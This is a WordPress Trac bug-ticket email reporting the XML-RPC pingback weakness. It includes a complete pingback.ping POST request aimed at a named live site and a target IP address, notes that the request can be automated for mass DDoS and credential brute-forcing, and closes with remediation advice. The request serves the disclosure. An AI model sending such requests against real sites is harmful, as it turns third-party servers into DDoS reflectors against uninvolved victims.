[wp-trac] [WordPress Trac] #50014: ping back vulnerability

WordPress Trac noreply at wordpress.org
Sun Apr 26 19:34:56 UTC 2020 

#50014: ping back vulnerability
--------------------------+-----------------------------
 Reporter:  jivanshu      |      Owner:  (none)
     Type:  defect (bug)  |     Status:  new
 Priority:  normal        |  Milestone:  Awaiting Review
Component:  XML-RPC       |    Version:
 Severity:  normal        |   Keywords:
  Focuses:                |
--------------------------+-----------------------------
 https://blog.optimizely.com/ is wordpress site

 Wordpress that have xmlrpc.php enabled for pingbacks, trackbacks, etc. can
 be made as a part of a huge botnet causing a major DDOS. The website
 https://blog.optimizely.com/ has the xmlrpc.php file enabled and could
 thus be potentially used for such an attack against other victim hosts.

 In order to determine whether the xmlrpc.php file is enabled or not, using
 the Repeater tab in Burp, send the request below. See screenshot

 Notice that a successful response is received showing that the xmlrpc.php
 file is enabled.
 Now, considering the domain https://blog.optimizely.com/, the xmlrpc.php
 file discussed above could potentially be abused to cause a DDOS attack
 against a victim host. This is achieved by simply sending a request that
 looks like below.
 POST /xmlrpc.php HTTP/1.1
 Host: blog.optimizely.com
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
 Gecko/20100101 Firefox/75.0
 Accept:
 text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Connection: close
 Upgrade-Insecure-Requests: 1
 Content-Length: 259

 <methodCall>
 <methodName> pingback.ping </methodName>
 <params>
 <param>
 <value>
 <string>https://216.58.221.46 </string>
 </value>
 </param>

 <param>
 <value>
 <string>https://blog.optimizely.com/ </string>
 </value>
 </param>

 </params>
 </methodCall>

 As soon as the above request is sent, the victim host
 (https://216.58.221.46) gets an entry in its log file with a request
 originating from the https://blog.optimizely.com// domain verifying the
 pingback.

 remediation:

 If the XMLRPC.php file is not being used, it should be disabled and
 removed completely to avoid any potential risks. Otherwise, it should at
 the very least be blocked from external access.

 thanks

 note: screenshots are given below

 Impact
 This can be automated from multiple hosts and be used to cause a mass DDOS
 attack on the victim.

 this method is also used for brute force attacks to stealing the admin
 credentials and other important credentials

-- 
Ticket URL: <https://core.trac.wordpress.org/ticket/50014>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform

More information about the wp-trac mailing list